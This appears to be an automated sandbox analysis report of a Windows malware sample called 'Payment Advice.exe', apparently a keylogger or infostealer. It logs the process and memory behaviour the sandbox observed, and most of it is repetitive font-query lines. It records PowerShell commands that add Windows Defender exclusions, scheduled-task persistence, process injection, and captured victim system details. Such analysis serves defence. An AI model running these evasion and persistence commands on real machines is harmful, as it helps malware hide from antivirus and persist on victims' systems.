                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^qDTime: 05/14/2024 14:57:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 81.181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}r
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 05/14/2024 14:57:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 81.181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}r
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002DD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<=
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}rTHcq`
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 05/14/2024 14:57:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 81.181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}rTe^qdI
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}THcq`
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
